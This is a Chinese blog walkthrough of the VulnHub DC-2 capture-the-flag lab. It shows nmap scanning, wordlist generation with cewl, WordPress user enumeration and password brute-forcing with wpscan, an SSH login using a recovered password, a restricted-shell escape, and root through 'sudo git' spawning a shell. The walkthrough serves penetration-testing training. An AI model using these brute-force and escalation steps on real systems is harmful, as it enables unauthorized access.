vulnhub实战:DC-2

vulnhub实战:DC-2

1.DC-2介绍

描述

与DC-1非常相似,DC-2是另一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。

与原始DC-1一样,它在设计时考虑了初学者的需求。

Linux技能和对Linux命令行的熟悉程度是必须的,基本的渗透测试工具的一些经验也是必须的。

就像DC-1一样,有五个标志,包括最后一个标志。

同样,就像DC-1一样,标志对初学者很重要,但对那些有经验的人来说并不那么重要。

简而言之,唯一真正重要的标志是最后一面旗帜。

对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。

我还没有探索实现root的所有方法,因为我放弃了我一直在研究的先前版本,并且除了基本操作系统安装之外,完全重新开

技术资料

DC-2 是一个基于 Debian 32 位构建的 VirtualBox VM,因此在大多数 PC 上运行它应该没有问题。

虽然我还没有在VMware环境中对其进行过测试,但它也应该可以正常工作。

它当前已针对桥接网络进行了配置,但是,可以对其进行更改以满足您的要求。为 DHCP 配置了网络。

安装很简单 - 下载它,解压缩它,然后将其导入VirtualBox,然后就可以走了。

请注意,您需要将渗透测试设备上的 hosts 文件设置为如下:

192.168.0.145 dc-2

显然,将 192.168.0.145 替换为 DC-2 的实际 IP 地址。

它将使生活变得更加简单(如果没有它,某个CMS可能无法正常工作)

2.安装部署

下载链接:

https://download.vulnhub.com/dc/DC-2.zip

下载之后使用VMware打开该文件,打开结果,设置为Net模式

在这里插入图片描述

3.信息收集

1.扫描此IP段中存活的靶机IP
arp-scan -l

发现靶场ip192.168.241.132

在这里插入图片描述

2.端口扫描
nmap -A -p- -T4 192.168.1.1		#详细扫描

在这里插入图片描述

发现打开了80端口,开启了web服务

于是访问该ip,发现自动跳转http://www.dc-2.com/,

在这里插入图片描述

再联想到该靶场介绍配置本地DNS解析,在host文件添加

192.168.241.132 dc-2			//C:\Windows\System32\drivers\etc

再次访问,发现flag

在这里插入图片描述

点击看到flag1

在这里插入图片描述

提示:登录以查看下一个标志,使用cewl密码攻击工具

3.进行目录探测

使用dirsearch工具:

在这里插入图片描述

4.进行cms识别

识别为WordPress4.7.10,在漏洞库可以发现存在许多漏洞

在这里插入图片描述

4.开始渗透

flag2

根据提示使用cewl生成密码字典(kail自带该工具)

cewl http://dc-2/ -w dict.txt			//保存在dict.txt中

在这里插入图片描述

使用wpscan对网站用户进行枚举爆破(kail自带)

WPScan是专门检查WordPress网站漏洞的工具,它可以全面检查wp网站的漏洞,例如插件,主题,备份文件等

 wpscan --url http://dc-2/ --enumerate u

发现三个用户admin,jerry,tom,保存到user.txt

在这里插入图片描述

接下来,我们来爆破账号密码

wpscan --url http://dc-2/ -U user.txt -P dict.txt

爆出两个账号密码

在这里插入图片描述

根据扫到的目录,进入登录页面

http://dc-2/wp-admin/

在这里插入图片描述

发现flag2,

在这里插入图片描述

提示找另一个切入点,

flag3

由于端口扫描时发现了ssh,改了端口为7744,于是尝试使用ssh登录

发现Jerry登录不了,而tom可以登录

ssh -p 7744 tom@192.168.241.132
parturient

在这里插入图片描述

发现flag3
在这里插入图片描述
在这里插入图片描述

flag4

提示了su和jerry

于是进行提权

BASH_CMDS[a]=/bin/sh;a 		//变量给a

/bin/bash 					//将命令给它就可以了

export PATH=$PATH:/bin/ 	//导入环境变量

export PATH=$PATH:/usr/bin 	//导入环境变量

在这里插入图片描述

进入/home/jerry,可以看到flag4

在这里插入图片描述

flag5

提示git,于是进行提权

sudo git -p help config

!/bin/bash

在这里插入图片描述
在这里插入图片描述

进入root根目录,发现最后一个flag,

在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值